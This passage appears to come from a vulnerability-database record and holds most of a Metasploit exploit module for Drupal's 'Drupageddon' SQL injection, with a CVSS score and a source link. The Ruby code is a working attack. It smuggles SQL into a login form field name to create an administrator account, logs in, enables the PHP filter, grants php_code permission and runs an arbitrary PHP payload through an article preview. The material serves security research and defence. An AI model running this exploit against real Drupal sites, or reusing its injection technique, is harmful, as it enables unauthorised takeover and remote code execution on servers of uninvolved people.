sql_insert_user(user, pass)\n \"insert into users (uid, name, pass, mail, status) select max(uid)+1, '#{user}', '#{generate_password_hash(pass)}', '#{Rex::Text.rand_text_alpha_lower(5)}@#{Rex::Text.rand_text_alpha_lower(5)}.#{Rex::Text.rand_text_alpha_lower(3)}', 1 from users\"\n end\n\n def sql_make_user_admin(user)\n \"insert into users_roles (uid, rid) VALUES ((select uid from users where name='#{user}'), (select rid from role where name = '#{admin_role}'))\"\n end\n\n def extract_form_ids(content)\n form_build_id = $1 if content =~ /name=\"form_build_id\" value=\"(.+?)\"/\n form_token = $1 if content =~ /name=\"form_token\" value=\"(.+?)\"/\n\n vprint_status(\"form_build_id: #{form_build_id}\")\n vprint_status(\"form_token: #{form_token}\")\n\n return form_build_id, form_token\n end\n\n def exploit_newuser\n\n # TODO: Check if option admin_role exists via admin/people/permissions/roles\n\n # call login page to extract tokens\n print_status(\"Testing page\")\n res = send_request_cgi({\n 'uri' => uri_path,\n 'vars_get' => {\n 'q' => 'user/login'\n }\n })\n\n unless res and res.body\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\n end\n\n form_build_id, form_token = extract_form_ids(res.body)\n\n user = Rex::Text.rand_text_alpha(10)\n pass = Rex::Text.rand_text_alpha(10)\n\n post = {\n \"name[0 ;#{sql_insert_user(user, pass)}; #{sql_make_user_admin(user)}; # ]\" => Rex::Text.rand_text_alpha(10),\n 'name[0]' => Rex::Text.rand_text_alpha(10),\n 'pass' => Rex::Text.rand_text_alpha(10),\n 'form_build_id' => form_build_id,\n 'form_id' => 'user_login',\n 'op' => 'Log in'\n }\n\n print_status(\"Creating new user #{user}:#{pass}\")\n res = send_request_cgi({\n 'uri' => uri_path,\n 'method' => 'POST',\n 'vars_post' => post,\n 'vars_get' => {\n 'q' => 'user/login'\n }\n })\n\n unless res and res.body\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\n end\n\n # login\n print_status(\"Logging in as #{user}:#{pass}\")\n res = send_request_cgi({\n 'uri' => uri_path,\n 'method' => 'POST',\n 'vars_post' => {\n 'name' => user,\n 'pass' => pass,\n 'form_build_id' => form_build_id,\n 'form_id' => 'user_login',\n 'op' => 'Log in'\n },\n 'vars_get' => {\n 'q' => 'user/login'\n }\n })\n\n unless res and res.code == 302\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\n end\n\n cookie = res.get_cookies\n vprint_status(\"cookie: #{cookie}\")\n\n # call admin interface to extract CSRF token and enabled modules\n print_status(\"Trying to parse enabled modules\")\n res = send_request_cgi({\n 'uri' => uri_path,\n 'vars_get' => {\n 'q' => 'admin/modules'\n },\n 'cookie' => cookie\n })\n\n form_build_id, form_token = extract_form_ids(res.body)\n\n enabled_module_regex = /name=\"(.+)\" value=\"1\" checked=\"checked\" class=\"form-checkbox\"/\n enabled_matches = res.body.to_enum(:scan, enabled_module_regex).map { Regexp.last_match }\n\n unless enabled_matches\n fail_with(Failure::Unknown, \"No modules enabled is incorrect, bailing.\")\n end\n\n post = {\n 'modules[Core][php][enable]' => '1',\n 'form_build_id' => form_build_id,\n 'form_token' => form_token,\n 'form_id' => 'system_modules',\n 'op' => 'Save configuration'\n }\n\n enabled_matches.each do |match|\n post[match.captures[0]] = '1'\n end\n\n # enable PHP filter\n print_status(\"Enabling the PHP filter module\")\n res = send_request_cgi({\n 'uri' => uri_path,\n 'method' => 'POST',\n 'vars_post' => post,\n 'vars_get' => {\n 'q' => 'admin/modules/list/confirm'\n },\n 'cookie' => cookie\n })\n\n unless res and res.body\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\n end\n\n # Response: http 302, Location: http://10.211.55.50/?q=admin/modules\n\n print_status(\"Setting permissions for PHP filter module\")\n\n # allow admin to use php_code\n res = send_request_cgi({\n 'uri' => uri_path,\n 'vars_get' => {\n 'q' => 'admin/people/permissions'\n },\n 'cookie' => cookie\n })\n\n\n unless res and res.body\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\n end\n\n form_build_id, form_token = extract_form_ids(res.body)\n\n perm_regex = /name=\"(.*)\" value=\"(.*)\" checked=\"checked\"/\n enabled_perms = res.body.to_enum(:scan, perm_regex).map { Regexp.last_match }\n\n unless enabled_perms\n fail_with(Failure::Unknown, \"No enabled permissions were able to be parsed, bailing.\")\n end\n\n # get administrator role id\n id = $1 if res.body =~ /for=\"edit-([0-9]+)-administer-content-types\">#{admin_role}:/\n vprint_status(\"admin role id: #{id}\")\n\n unless id\n fail_with(Failure::Unknown, \"Could not parse out administrator ID\")\n end\n\n post = {\n \"#{id}[use text format php_code]\" => 'use text format php_code',\n 'form_build_id' => form_build_id,\n 'form_token' => form_token,\n 'form_id' => 'user_admin_permissions',\n 'op' => 'Save permissions'\n }\n\n enabled_perms.each do |match|\n post[match.captures[0]] = match.captures[1]\n end\n\n res = send_request_cgi({\n 'uri' => uri_path,\n 'method' => 'POST',\n 'vars_post' => post,\n 'vars_get' => {\n 'q' => 'admin/people/permissions'\n },\n 'cookie' => cookie\n })\n\n unless res and res.body\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\n end\n\n # Add new Content page (extract csrf token)\n print_status(\"Getting tokens from create new article page\")\n res = send_request_cgi({\n 'uri' => uri_path,\n 'vars_get' => {\n 'q' => 'node/add/article'\n },\n 'cookie' => cookie\n })\n\n unless res and res.body\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\n end\n\n form_build_id, form_token = extract_form_ids(res.body)\n\n # Preview to trigger the payload\n data = Rex::MIME::Message.new\n data.add_part(Rex::Text.rand_text_alpha(10), nil, nil, 'form-data; name=\"title\"')\n data.add_part(form_build_id, nil, nil, 'form-data; name=\"form_build_id\"')\n data.add_part(form_token, nil, nil, 'form-data; name=\"form_token\"')\n data.add_part('article_node_form', nil, nil, 'form-data; name=\"form_id\"')\n data.add_part('php_code', nil, nil, 'form-data; name=\"body[und][0][format]\"')\n data.add_part(\"<?php #{payload.encoded} ?>\", nil, nil, 'form-data; name=\"body[und][0][value]\"')\n data.add_part('Preview', nil, nil, 'form-data; name=\"op\"')\n data.add_part(user, nil, nil, 'form-data; name=\"name\"')\n data.add_part('1', nil, nil, 'form-data; name=\"status\"')\n data.add_part('1', nil, nil, 'form-data; name=\"promote\"')\n post_data = data.to_s\n\n print_status(\"Calling preview page. Exploit should trigger...\")\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri_path,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data,\n 'vars_get' => {\n 'q' => 'node/add/article'\n },\n 'cookie' => cookie\n )\n end\n\n ##\n # Main\n ##\n\n def exploit\n case datastore['TARGET']\n when 0\n exploit_formcache\n when 1\n exploit_newuser\n else\n fail_with(Failure::BadConfig, \"Invalid target selected.\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/drupal_drupageddon.rb"}]}